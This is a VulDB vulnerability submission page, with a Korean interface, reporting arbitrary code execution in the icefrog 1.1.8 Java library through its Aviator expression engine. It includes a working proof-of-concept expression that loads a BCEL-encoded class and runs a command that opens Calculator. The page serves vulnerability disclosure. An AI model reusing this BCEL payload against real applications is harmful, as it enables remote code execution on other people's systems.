제출 #169999: icefrog v1.1.8 Hava an Execute Arbitrary Code vulnerability정보

제목icefrog v1.1.8 Hava an Execute Arbitrary Code vulnerability
설명IceFrog is a suite of core and expanded libraries that include utility classes, collections, I/O classes, and much more.a tools like Guava ,apache commons,hutool. In icefrog 1.1.8, the reference enters the aviator engine to parse the expression, and the aviator expression can directly enter the new object, but it is not allowed to call non-public static methods. You can use BCELClassloader to load BCEL code to accomplish RCE. When a user uses icefrog to parse an expression, the aviator template engine is triggered, leading to an arbitrary code execution vulnerability. the testCode is here: import com.whaleal.icefrog.extra.expression.ExpressionUtil; String exp = "'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$5dP$cbJ$c3$40$U$3d$d3$a6M$8d$d1$b6$d6$fa$CAW$a6$5d$98$8d$bb$88$hQ$Q$8a$V$x$ee$93x$JS$f2$uy$94$7c$96nT$5c$f8$B$7e$94x$tJ$5b$i$98s$ef$3d$9c$3b$e70_$df$l$9f$A$cep$60$a0$81$8e$81$$$b6$U$f4tl$eb$e8$L4$cfe$y$f3$L$81$ba5x$U$d0$$$93$t$Sh$8fdL$b7E$e4Q$fa$e0z$n3$g$95$e4$L$9cX$a3$a9$3bw$ed$d0$8d$D$7b$92$a72$O$9c$c1$Ku$97$s$3ee$99$p$60$5c$95$3e$cdr$99$c4$99$8e$j$9e$tI$91$fat$z$d5kk4$97$e1$a9Z3$d1$84$aec$d7$c4$k$f6M$YX$X$e8$qi$60S$e9F$b3$90l$a5dji1$f6$a6$e4$e7$C$bd$8a$92$89$7d3$5eX$Jt$97$c2$fb$o$cee$c4nF$40$f9b$e8$5b$aby$ffh$H$c7$d0$f8$83$d4$a9A$a8L$8c$z$9e$O$b9$K$ae$8d$e1$h$c4$L7$i$9e$b1$f9Kr$cf$89yEI$8f$aaU$a0$f5$8e$da$f0$V$f5$e7$7fj$j$s$a3$c6$fd$G$df$cd$ca$aa$fd$D$fe$90$a41$a1$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"open /System/Applications/Calculator.app\") );"; final Object eval = ExpressionUtil.eval(exp, null);
원천⚠️ https://github.com/NanKeXXX/selfVuln_poc/blob/main/whaleal%3Aicefrog/icefrog_1.1.8_RCE.md
사용자
 dreamfly (UID 37785)
제출2023. 06. 15. AM 08:58 (3 연령 ago)
모더레이션2023. 06. 18. AM 09:49 (3 days later)
상태수락
VulDB 항목231804 [whaleal IceFrog 1.1.8 Aviator Template Engine 권한 상승]
포인트들20

Do you know our Splunk app?

Download it now for free!